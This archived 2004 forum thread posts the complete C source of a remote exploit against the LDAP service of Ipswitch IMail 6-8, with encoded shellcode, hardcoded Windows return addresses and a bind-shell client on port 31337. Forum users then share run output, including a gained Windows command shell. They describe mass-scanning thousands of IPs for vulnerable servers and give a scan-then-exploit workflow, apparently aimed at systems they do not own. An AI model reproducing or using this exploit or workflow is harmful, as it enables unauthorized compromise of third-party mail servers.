Ipswitch Imail Ldap Remote Exploit

Full Version: Ipswitch Imail Ldap Remote Exploit

GovernmentSecurity.org > The Archives > Exploit Articles

GaLiaRePt

Feb 26 2004, 06:27 PM

Ipswitch IMail LDAP Remote Exploit
Date: 2004-02-26

Author : Johnny Cyberpunk <jcyberpunk@thc.org>
Download : http://www.security-corporation.com/downlo...it/THCimail.zip

CODE

/*****************************************************************************/
/* THCimail 0.1 - Wind0wZ remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by idefense or some idefense slaves;) */
/* http://www.idefense.com/application/poi/display?id=74&type=vulnerabilities*/
/* */
/* compile with MS Visual C++ : cl THCimail.c */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

char *WIN2KEN = "\xc4\x2a\x02\x75";
char *WIN2KPG = "\xc4\x2a\xf9\x74";
char *WINXPSP1G = "\xfe\x63\xa1\x71";

#define jumper "\xeb\x06\x4a\x43"

char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";

char shellcode[] =
"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
"\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
"\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
"\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
"\xda\x63\xe5\x70\x70\xda\x6f";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER;
unsigned char *finalbuffer,*crapbuf1,*crapbuf2;
unsigned int IMAIL6_7=60;
unsigned int IMAIL_8=68;

struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("\nTHCimail v0.1 - Imail LDAP exploit\n");
printf("tested on Imail 6-8\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

if(argc<4 || argc>4)
usage();

ver = (unsigned short)atoi(argv[3]);
switch(ver)
{
case 0:
IMAILVER = IMAIL6_7;
break;
case 1:
IMAILVER = IMAIL_8;
break;
default:
printf("\nYou entered an illegal version !\n\n");
usage();
exit(-1);
}

crapbuf1 = malloc(IMAILVER);
memset(crapbuf1,'X',IMAILVER);

printf("imailver = %d\n",IMAILVER);

crapbuf2 = malloc(2220);
memset(crapbuf2,'X',2220);

finalbuffer = malloc(2650);
memset(finalbuffer,0,2650);

printf("\n[*] building buffer\n");

strcat(finalbuffer,ldapshit);

strcat(finalbuffer,crapbuf1);

strcat(finalbuffer,jumper);

os = (unsigned short)atoi(argv[2]);
switch(os)
{
case 0:
strcat(finalbuffer,WIN2KPG);
break;
case 1:
strcat(finalbuffer,WIN2KPG);
break;
case 2:
strcat(finalbuffer,WINXPSP1G);
break;
default:
printf("\nYou entered an illegal OS !\n\n");
usage();
exit(-1);
}

strcat(finalbuffer,shellcode);
strcat(finalbuffer,crapbuf2);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}

if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;

if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(389);

printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,finalbuffer,2650,0);
printf("[*] Exploit send successfully ! Sleeping a while ....\n");
Sleep(1000);
}
else
printf("\nCan't connect to ldap port!\n");

if(rc==0)
{
printf("[*] Trying to get a shell\n\n");
sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port = htons(31337);
rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
if(rc!=0)
{
printf("can't connect to port 31337;( maybe firewalled ...\n");
exit(-1);
}
shell(sock2);
}

shutdown(sock,1);
closesocket(sock);

free(crapbuf1);
free(crapbuf2);
free(finalbuffer);

exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <Host> <OS> <Imail Version>\n");
printf("Sample: THCimail 194.44.55.56 0 1\n\n");
printf("OS:\n");
printf("0 - Windows 2000 Server english all service packs\n");
printf("1 - Windows 2000 Professional german\n");
printf("2 - Windows XP SP1 german\n\n");
printf("Imail Version:\n");
printf("0 - Imail 6+7\n");
printf("1 - Imail 8\n");
exit(0);
}

void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}

usch

Feb 26 2004, 07:02 PM

nice man.hope this is better than the one by kralor

extreme

Feb 26 2004, 07:12 PM

yap, downloaded, tested it, and it didn't work at all... I tryed ever possible server version, and even those I managed to hack with previous exploits. So, this one is the worst of them all.... Don't even waste your time with it...
On secnod thought.. I am on LAN, so it might be that is why it didn't work?!
Cause I don't think it requires netcat sett up... So it gotta get my IP locally, and that is 192.0.0.1 and it might not work because of that. If someone can modify it, I would be gratefull..

Sick-Boy

Feb 26 2004, 09:32 PM

Seams to work... Never got a shell though

THCimail v0.1 - Imail LDAP exploit
tested on Imail 6-8
by Johnny Cyberpunk (jcyberpunk@thc.org)
imailver = 68

[*] building buffer
[*] connecting the target
[*] Exploit send successfully ! Sleeping a while ....
[*] Trying to get a shell

can't connect to port 31337 ;( maybe firewalled ...

C:\>

Im not sure how to find what version the Imail is

Leonnetje

Feb 26 2004, 09:53 PM

QUOTE (Sick-Boy @ Feb 26 2004, 09:32 PM)

Im not sure how to find what version the Imail is

Use SL to check your scans @ port 25 !! Then check the banner for you iMail version.

Checked about 30 scans with iMail 7.x version... no shells.....

Sick-Boy

Feb 26 2004, 10:14 PM

thanks ... works got a shell

THCimail v0.1 - Imail LDAP exploit
tested on Imail 6-8
by Johnny Cyberpunk (jcyberpunk@thc.org)
imailver = 60

[*] building buffer
[*] connecting the target
[*] Exploit send successfully ! Sleeping a while ....
[*] Trying to get a shell

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Heater

Feb 26 2004, 10:56 PM

I didn't receive shell

I have bye bye... all time.

CODE

THCimail v0.1 - Imail LDAP exploit
tested on Imail 6-8
by Johnny Cyberpunk (jcyberpunk@thc.org)
imailver = 60

[*] building buffer
[*] connecting the target
[*] Exploit send successfully ! Sleeping a while ....
[*] Trying to get a shell

bye bye...

extreme

Feb 26 2004, 11:14 PM

@Sick-boy
Can you explain a bit more what you did...
Are you on LAN, how many IPs did you check before first shell, did you set up NC listener or you just fired exploit...

Sedolf

Feb 26 2004, 11:17 PM

I had 16900 p 389 scans
checked with scanline and got 20 imail servers
then hacked with the thc exploit: 11 couldnt connect to ldap service
9 could connect but didnt give me a shell
so no shell out of 17000 ips -> this sploit is crap (imho)
btw I never got bye bye

Sick-Boy

Feb 27 2004, 12:16 AM

Yeah that was the only shell i got .... there aint many out there ....

for those who wanted to try

scan 389
put results in a txt

sl.exe -bhpt 25 -f scan.txt -o vulnerable.txt

use that in scanline look at vulnerable.txt for Imail
then use the xploit

THCimail.exe <ip> <OS> <Imail Version>

for os i put 0 cause i wasnt scanning german servers

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.